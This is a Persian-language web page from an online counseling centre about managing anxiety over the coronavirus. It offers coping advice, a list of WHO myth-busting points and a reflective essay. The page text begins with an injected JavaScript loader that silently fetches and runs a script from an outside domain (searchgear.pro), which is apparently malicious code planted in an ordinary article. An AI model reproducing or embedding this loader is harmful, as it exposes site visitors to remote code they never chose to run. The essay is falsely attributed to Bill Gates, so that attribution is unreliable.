;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); کرونا ویروس | مرکز مشاوره آنلاین روان‌یاری

کرونا ویروس

میزان پیشرفت خواندن شما

فهرست مطالب

با اضطراب ابتلا به بیماری کرونا چه کنیم؟

خبرهای مربوط به کرونا بیشتر از خود ویروس در حال گسترش است.اعلام آمار مبتلایان و فوت ناشی از این بیماری و ناباوری و بی اعتمادی مردم به درست بودن آمارهای رسمی اضطراب ابتلا به این بیماری را بیشتر می کند.

اضطراب واکنش طبیعی به شرایط دشوار است اما آنچه در اضطراب اهمیت دارد طولانی شدن آن است که سیستم ایمنی را ضعیف می کند و شانس ابتلا به بیماری ها را بالاتر می برد.

اما سوال اینجاست چگونه با این اضطراب مقابله کنیم؟؟

در ابتدا باید یادآور شد که هرچه اطلاعات ما در مورد این ویروس بیشتر و علمی تر باشد کنترل اضطراب ناشی از ابتلا به آن بهتر صورت می گیرد،پس لطفا اطلاعات را از سایت های علمی معتبر مانند سایت سازمان بهداشت جهانی یا وزارت بهداشت و دانشگاه های علوم پزشکی دریافت کنید.دستورالعمل های پیشگیری آمده در این سایت ها بسیار ساده و قابل انجام است که مهم ترین آن شستشوی مکرر دست ها با آب و صابون و پرهیز از تردد در اماکن شلوغ و پرازدحام است.

نکته قابل توجه دیگر این است که دو درصد مبتلایان به این ویروس فوت می کنند یعنی از هر صدنفر فرد مبتلا دو نفر فوت می کنند و نود و هشت نفر بهبود می یابند.پس در نگاهی کاملاً خوشبینانه می توان امید داشت در صورت ابتلا امکان بهبودی بیشتر از فوت می باشد.

مسلماً افرادی که سابقه بیماری های اضطرابی داشته اند مثل اضطراب فراگیر،اضطراب ابتلا به بیماری و … بیشتر در معرض خطر اضطراب ابتلا به کرونا هستند و بهتر است به روانپزشک و یا روانشناس خود مراجعه کنند و مشاوره دریافت کنند تا اضطرابشان کنترل شود. اما افرادی که سابقه بیماری های اضطرابی ندارند ولی درگیر اضطراب ابتلا به کرونا هستند با در نظر داشتن مواردی که در بالا به آن اشاره شد می توانند با روش هایی مثل صحبت با دوستان،ورزش کردن،تمرین های ریلکسیشن (آرام سازی) و هر فعالیت دیگری که از قبل برای کاهش اضطراب خود استفاده می کردند استفاده کنند.

کرونا ویروس
http://کرونا ویروسhttp://ravanyari.com/%d8%b4%d8%a7%d8%af%da%a9%d8%a7%d9%85%db%8c/

در پایان تکرار این نکته ضروریست که ترس اگرچه طبیعی است و باعث می شود که محتاطانه تر عمل کنیم ولی وقتی بیشتر از حد باشد باعث اضطراب شده و سیستم ایمنی یعنی آنچه که بیشتر از همه نیاز داریم تا سالم باشد تضعیف می گردد.پس لطفا به شایعات منتشر شده توجه نکنید و به ترس  و اضطراب خود دامن نزنید و اطلاعات را از سامانه های معتبر دریافت کنید.

پاسخ سازمان جهانی بهداشت به شایعات در مورد کووید19 :

در روزهای اخیر شایعات زیادی در مورد ویروس کرونا در شبکه های اجتماعی دست به دست می شود.سازمان جهانی بهداشت برخی از این  موارد را بررسی کرده است.موارد زیر حقایقی در مورد کرونا هستند.

* شبکه های همراه 5G موجب انتشار ویروس کرونا نمی شود.

* قرار گرفتن در معرض نورخورشید یا دمای بالاتر از 25 درجه سانتی گراد قرارگرفتن،موجب پیشگیری از کرونا نمی شود.

* ابتلا به کرونا به معنی مبتلا بودن به آن در تمام طول عمر نیست و امکان بهبودی از آن وجود دارد.

* توانایی نگه داشتن نفس به مدت 10 ثانیه یا بیشتر بدون سرفه یا احساس ناراحتی به معنی نداشتن کرونا یا سایر بیماری های تنفسی نیست.

  چگونه از استرس و اضطراب شدید نجات پیدا کنیم؟

* نوشیدنی های الکی از شما در برابر کرونا محافظت نمی کنند و ممکن است خطرناک هم باشد.

کرونا ویروس
http://کرونا ویروسhttp://ravanyari.com/%d8%a7%d8%b1%d8%aa%d8%a8%d8%a7%d8%b7%d8%a7%d8%aa/

* ویروس کرونا می تواند در اقلیم های گرم و مرطوب منتقل شود.

* هوای سرد و برف نمی تواند ویروس کرونا را از بین ببرد.

* دوش آب گرم از ابتلا به کرونا پیشگیری نمی کند.

* ویروس کرونا از طریق نیش پشه منتقل نمی شود.

* خشک کننده های دست موجب از بین رفتن ویروس کرونا نمی شوند.

* از لامپ ضدعفونی کننده فرابنفش برای ضدعفونی کردن دست ها نباید استفاده شود.

* اسکنرهای حرارتی نمی توانند همه افراد مبتلا به ویروس کرونا را تشخیص دهند.

* اسپری کردن الکل یا کلر بر روی کل بدن نمی تواند ویروس کرونا را از بین ببرد.

* واکسن علیه پنومونی نمی تواند علیه ویروس کرونا به کار رود.

* شست و شوی منظم بینی با سرم شستشو از ابتلا به ویروس کرونا پیشگیری نمی کند.

* شواهدی در مورد توانایی شیر در پیشگیری از ابتلا به ویروس کرونا وجود ندارد.

* تمام رده های سنی در برابر ویروس کرونا آسیب پذیرند.

* آنتی بیوتیک ها امکان پیشگیری یا درمان کرونا را ندارند.

* تا این لحظه دارویی برای پیشگیری یا درمان قطعی ویروس کرونا وجود ندارد.

نظر بیل گیتس در مورد ویروس کرونا:

کووید 19 واقعاً چه چیزی به ما یاد میدهد؟؟

من عمیقاً باور دارم که هدفی معنوی در پس هر آنچه اتفاق می افتد وجود دارد،چه برداشت ما از آن اتفاق خوب باشد،چه بد.

1. این ویروس به ما یادآوری می کند که ما همه برابر هستیم،صرف نظر از فرهنگ،مذهب،حرفه،وضعیت مالی یا میزان شهرتِ مان.این ویروس با همه ما به طور یکسان برخورد می کند،شاید ما هم باید همین کار را انجام دهیم.اگر حرف من را باور نمی کنید از تام هنکس بپرسید.

2. به ما یادآوری می کند که همه به هم وصل هستیم و آنچه بر یک انسان اثر می گذارد،می تواند بر دیگری نیز اثر بگذارد.به ما یادآوری می کند مرزهای نادرستی که تعیین کرده ایم،ارزش زیادی ندارند،چرا که این ویروس نیازی به پاسپورت ندارد.این ویروس با قراردادن ما در تنگنا و بحران،کسانی را به ما یادآوری می کند که همیشه تحت ظلم واقع شده اند.

3. به ما یادآوری می کند که سلامتِ مان چه قدر با ارزش است و چگونه ما با خوردن غذاهای ناسالم و آب هایی آلوده به مواد شیمیایی،همیشه از آن غافل بوده ایم.اگر مراقب سلامت خود نباشیم،قطعاً بیمار خواهیم شد.

4. به ما یادآوری می کند که زندگی چقدر کوتاه است و اینکه مهم ترین کار هر انسان کمک به دیگران و به خصوص افراد سالخورده و بیمار است.هدف ما خریدن دستمال توالت نیست !

کرونا ویروس
http://کرونا ویروس

5. به ما یادآوری می کند جامعه ما چقدر ماده گرا شده و در هنگام سختی ها آنچه بدان نیاز داریم،نیازهای اولیه مانند آب و غذا و دارو است نه تجملاتی که گاهی بدون دلیل بر آن ها ارزش میگذاریم.

6. به ما یادآوری می کند خانه و خانواده چقدر اهمیت دارند و چقدر ما از آن ها غافل بوده ایم.این ویروس ما را به خانه هایمان برگردانده تا دوباره بتوانیم وحدت خانواده خود را مستحکم کنیم.

7. به ما یادآوری می کند که کار اصلی ما شغلمان نیست.شغل کاری است که ما انجام میدهیم،نه آنچه بخاطر آن به دنیا آمده ایم.کار اصلی ما مراقبت از یکدیگر است،محافظت از یکدیگر و کمک به یکدیگر.

  اختلال افسردگی؛ علائم و درمان

8.به ما یادآوری می کند که نفس خود را تحت کنترل داشته باشیم.یادآوری می کند هر چقدر هم که فکر می کنیم بزرگ هستیم،یا دیگران فکر می کنند بزرگ هستیم،تنها یک ویروس می تواند دنیای ما را متوقف کند.

کرونا ویروس
http://کرونا ویروس

9 . به ما یادآوری می کند که قدرت اختیار و اراده در دستان ماست.می توانیم انتخاب کنیم که همکاری کرده و به یکدیگر کمک کنیم،ببخشیم،تقسیم کنیم.یا می توانیم انتخاب کنیم خودخواه باشیم،احتکار کنیم،یا فقط از خودمان مراقبت کنیم.قطعاً در سختی ها است که هر شخص رنگ واقعی خود را آشکار می کند.

10. به ما یادآوری می کند که میتوانیم صبور باشیم،یا وحشت زده شویم.میتوانیم درک کنیم که چنین شرایطی بارها و بارها در طول تاریخ اتفاق افتاده و این نیز خواهد گذشت،یا بترسیم و امروز را آخر دنیا بدانیم و در نتیجه بیشتر باعث ضرر شویم تا سود.

11. به ما یادآوری میکند که این شرایط می تواند یک پایان یا آغازی دوباره باشد.می تواند زمانی برای تأمل و درک باشد،برای یادگرفتن از اشتباهات؛یا می تواند آغاز چرخه ای باشد که آنقدر ادامه می یابد تا ما نهایتاً آنچه که باید را یاد بگیریم.

12. به ما یادآوری می کند که کره زمین بیمار است.یادآوری می کند باید همانطور که به سرعتِ خالی شدن قفسه های دستمال توالت نگاه می کنیم،به میزان جنگل زدایی نیز نگاهی داشته باشیم.ما بیمار هستیم،چرا که خانه ی ما بیمار است.

13. به ما یادآوری می کند که بعد از هر سختی،همیشه آسانی ست.زندگی یک چرخه است،و این نیز مرجله ای در این چرخه ی بزرگ است.نیازی نیست بترسیم،این نیز میگذرد.

در حالیکه تعداد زیادی کرونا را یک فاجعه ی بزرگ به حساب می آورند،من ترجیح میدهم آن را یک اصلاح کننده ی بزرگ ببینم.چیزی که فرستاده شده تا درس هایی که ظاهراً فراموش کرده ایم را به ما یادآوری کند و این بستگی به ما دارد که آن ها را یاد بگیریم یا نه !

کرونا ویروس
http://ravanyari.com/%d8%aa%d8%b9%d8%a7%d8%b1%d8%b6%d8%a7%d8%aa-%d8%b2%d9%86%d8%a7%d8%b4%d9%88%db%8c%db%8c/http://کرونا ویروس
Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.